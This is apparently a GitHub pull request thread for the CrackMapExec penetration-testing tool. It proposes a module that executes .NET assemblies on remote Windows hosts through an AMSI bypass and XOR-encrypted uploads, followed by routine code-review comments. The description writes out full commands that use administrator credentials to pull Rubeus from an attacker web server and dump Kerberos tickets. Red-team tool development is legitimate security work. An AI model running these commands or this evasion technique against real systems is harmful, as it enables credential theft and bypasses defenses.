Execute Remote Or Local Assembly

Shad0wC0ntr0ller opened the pull request:
My best attempt at adding a much needed feature.

EXECUTE A REMOTE ASSEMBLY OR UPLOAD AN ENCRYPTED ASSEMBLY TO DISK WHICH IS THEN DECRYPTED AND EXECUTED USING A MODIFIED VERSION OF https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e (C# Amsi bypass with hardware breakpoint)

Version actually embedded into this module can be found here -> https://github.com/Shad0wC0ntr0ller/CMEAssemblyExec

This module has 3 options

1. ASSEMBLY_ARGS -> Arguments to be passed to the modifed version of https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e   (which is the assembly_embedded64)
        
2. UPLOAD_ASSEMBLY -> Uploads an assembly from your localhost to the target machine, useful for instances where the target machine cannot reach your web server

3. XOR_KEY -> set a custom xor key to be applied to the assembly being uploaded (Strings are accepted such as 'S3cur3k3Y' , does not have to be a single byte like 0x55), if xor_key is not specified, 0x55 is auto applied to the uploaded assembly


How it works

**Load a Remote Assembly** -> the modified remote assembly file is dropped to disk, then executed with the arguments of assembly_args passed to it. For this example, the user should have a web server running with the assembly they want to remote load in the directory of the web server.

cme smb 192.168.199.162 -u Administrator -p 'admin123!'  -M assembly -o ASSEMBLY_ARGS="http://192.168.199.149/rubeus.exe tgtdeleg /nowrap" --exec-method smbexec


![image](https://github.com/mpgn/CrackMapExec/assets/90877534/ae1dc823-8a3f-4878-9609-85dbd1695095)


**Upload an encrypted assembly with default key 0x55 applied** -> Encrypted assembly file placed on disk -> CMEAssemblyExec is dropped to disk -> then executed with the arguments of assembly_args passed to it
the decryption key and file path are passed to the assembly_args on the back end so the user does not need to remember to do that, just the command you want your assembly to run

cme smb 192.168.199.231 -u Administrator -p 'admin123!'  -M assembly -o UPLOAD_ASSEMBLY="/root/Desktop/rubeus.exe"  ASSEMBLY_ARGS="tgtdeleg /nowrap" --exec-method smbexec 


![image](https://github.com/mpgn/CrackMapExec/assets/90877534/fe759008-618f-4e4c-b617-2e8d2b853b33)


**Upload an encrypted assembly with a custom xor key applied** ->  Encrypted assembly file placed on disk -> CMEAssemblyExec is dropped to disk -> then executed with the arguments of assembly_args passed to it
the decryption key and file path are passed to the assembly_args on the back end so the user does not need to remember to do that, just the command you want your assembly to run

cme smb 192.168.199.231 -u Administrator -p 'admin123!'  -M assembly -o UPLOAD_ASSEMBLY="/root/Desktop/rubeus.exe" XOR_KEY='CrackMapRocks' ASSEMBLY_ARGS="triage" --exec-method smbexec 


![image](https://github.com/mpgn/CrackMapExec/assets/90877534/f3826ee6-04da-4287-9ad3-3ac6badb6957)

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+        
+        if 'assembly_args' in module_options.keys():
+            self.assembly_args = module_options['assembly_args']
+        elif 'ASSEMBLY_ARGS' in module_options.keys():
```
I think a competent user should be able to understand that they should keep their arguments case sensitve. Documentation will provide the use case.

NeffIsBack replied:
Actually this is always uppercase. See: https://github.com/mpgn/CrackMapExec/blob/7d036af01262afc0cce0858d2f3097135ed21263/cme/loaders/moduleloader.py#L89

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+            self.assembly_args = module_options['ASSEMBLY_ARGS']
+        else:
+            self.assembly_args = ''
+            context.log.info(f'No assembly_args provided. Set self.assembly_args: {self.assembly_args}')
```
This should read as a context.log.error

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+
+        if 'xor_key' in module_options.keys():
+            self.xor_key = bytes(module_options['xor_key'], 'utf-8')
+        elif 'XOR_KEY' in module_options.keys():
```
I think a competent user should be able to understand that they should keep their arguments case sensitve. Documentation will provide the use case.

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+        else:
+            self.xor_key = b'\x55'  # Default value
+
+        self.tmp_dir = module_options.get('tmp_dir', "C:\\windows\\temp\\")
```
The default choice here is a tad odd because you are already going to be getting rid of `C` on line 58.

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+        self.web_server_process = None
+
+    
+    @staticmethod
```
Move this out of the class as you did with `xor_encrypt`. There is no real use of it being a static method.

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+            xor_key_used = True
+            try:
+                upload_assembly_dir = os.path.dirname(self.upload_assembly)
+                with open(self.upload_assembly, 'rb') as assembly_file:
```
There is a lot of embedded `with open` statements here.

I would recommend to make this more clean by using the `open` statement and closing it when done.

```
assembly_file = open(self.upload_assembly,'rb')
<XOR Encrypt Logic Here>
assembly_file.close()

enc_assembly_file = open(encrypted_assembly_path,'wb')
<WRITE LOGIC HERE>
enc_assembly_file.close()

ETC

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+                    encrypted_assembly = xor_encrypt(assembly_file.read(), self.xor_key)
+                    random_local_name = self.random_filename() + '.Enc'
+                    encrypted_assembly_path = os.path.join(upload_assembly_dir, random_local_name)
+                    with open(encrypted_assembly_path, 'wb') as enc_assembly_file:
```
Double open for this file on line 107 and 112.
Instead, remove 112 and specify `w+b` instead of just `wb` which will allow for write and read. You will need to reset the filedescriptor to the beginning.

```
>>> a = open("pythontest.txt",'w+b')
>>> a.write(b'ABC')
3
>>> a.seek(0,0)
0
>>> a.read()
b'ABC'
```

ILightThings commented on cme/modules/ExecuteAssembly.py:
```diff
@@ -0,0 +1,164 @@
+            except Exception as e:
+                context.log.error('Error writing file to share {}: {}'.format(self.share, e))
+        else:
+            self.web_server_process = subprocess.Popen(['python3', '-m', 'http.server', '80'], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
```
This should not be called in crackmapexec. A user should have complete control of a webserver such as what kind of webserver they are using (python, apache, PHP, go), what the server display when a user visits it, how encryption is handled, and what port it is located on.

Shad0wC0ntr0ller replied:
Great, I will work on these changes over the coming week. Thank you

ILightThings reviewed (commented):
I just went over the basics of the module. I have not tested this in a controlled environment yet. But there is some cleanup to do.

Shad0wC0ntr0ller commented:
1. Change Module descriptions lowercase - Fixed
2. remove incase sensitive args - Fixed
3. line 47 change to context.log.error - Fixed
4. move line 93 the static method outside of class - Fixed
5. Double open for this file on L107 and L112. Instead, remove 112 and specify w+b instead of just wb which will allow for write and read. You will need to reset the file descriptor to the beginning. - Fixed
6. remove python web server - Fixed
7. The default choice here is a tad odd because you are already going to be getting rid of C on line 58. - Fixed
8. Fix pull request writeup - Fixed


I would like to mention im new to doing the pull request ( if that's not already obvious ), so I appreciate your patience and guidance. Everything should be fixed from the previous recommendations. 

I believe I have everything figured out now with creating new branches for each pull request. I do have one question, I have a few modules that ive been using for awhile privately such as
Find all obsolete operating systems , Find all trusts and direction, Find all accounts configured with delegation and what objects can they delegate to, domain admins that are not members of protected users, and a few more.
All of these modules would belong to the ldap protocol, would i need to make a pull request for everyone or can I explain them all in one pull request. Thank you

NeffIsBack commented:
Hi, thanks for the PR.
Regarding to your Pull reqeust for the modules, for me it is okay to put 1-2 modules in the same PR but don't overload it. That gets complicated really fast. If you got several modules its better to seperate them into multiple PRs so we can go over each one by one.

Shad0wC0ntr0ller commented:
I will improve this project and open a request at another time.
